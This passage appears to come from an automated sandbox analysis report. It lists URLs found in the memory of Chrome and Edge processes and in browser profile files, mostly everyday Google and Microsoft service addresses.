                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ch
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Fh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Kj
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Mh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Oi
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ph
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Wh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Yn
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Zh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ah
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/bi
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/dh
                Source: chrome.exe, 00000012.00000003.2717797344.0000004400684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gjD
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hi
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/kh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/nh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/oi
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/uh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/xh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/yi
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717797344.0000004400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000012.00000003.2717797344.0000004400684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Di
                Source: chrome.exe, 00000012.00000003.2717797344.0000004400684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                Source: chrome.exe, 00000012.00000003.2717797344.0000004400684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                Source: chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 00000019.00000002.3001859074.000074F4024D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000012.00000002.2810709854.00002780006AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: HDJEU3.12.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000012.00000003.2768069391.00002780019A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000012.00000003.2768069391.00002780019A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000012.00000002.2794787920.0000004400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardD$
                Source: chrome.exe, 00000012.00000002.2796287793.0000004400770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardDw_
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000012.00000002.2796287793.0000004400770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000012.00000003.2718142438.00000044006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                Source: chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
                Source: chrome.exe, 00000012.00000002.2796265003.0000004400744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 00000012.00000002.2809376618.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735151718.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732621548.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736735650.0000278000358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: msedge.exe, 00000019.00000002.3001859074.000074F4024D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000019.00000002.3001859074.000074F4024D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: Cookies.28.drString found in binary or memory: https://msn.comXID/
                Source: Cookies.28.drString found in binary or memory: https://msn.comXIDv10
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 00000012.00000002.2809715374.000027800040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811516626.0000278000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810228742.0000278000544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhones
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000012.00000002.2809715374.000027800040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811516626.0000278000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810228742.0000278000544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812014272.0000278000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 000003.log8.27.dr, 2cc80dabc69f58b6_0.27.drString found in binary or memory: https://ntp.msn.com
                Source: 000003.log7.27.drString found in binary or memory: https://ntp.msn.com/
                Source: QuotaManager.27.drString found in binary or memory: https://ntp.msn.com/_default
                Source: Session_13379538502196996.27.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.27.dr, QuotaManager-journal.27.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: QuotaManager.27.dr, QuotaManager-journal.27.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default/
                Source: 2cc80dabc69f58b6_0.27.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 00000019.00000002.3001859074.000074F4024D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000012.00000002.2808631973.00002780000FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.goog
                Source: chrome.exe, 00000012.00000003.2776245551.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2818760916.00002780012E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 00000012.00000002.2814607259.0000278000ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2818760916.00002780012E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000012.00000003.2736886824.0000278000A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814607259.0000278000ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 00000012.00000003.2736886824.0000278000A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 00000012.00000002.2808273997.0000278000014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 00000012.00000003.2736886824.0000278000A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809276901.00002780002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 00000012.00000003.2736886824.0000278000A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000012.00000002.2814607259.0000278000ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2814206533.0000278000E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
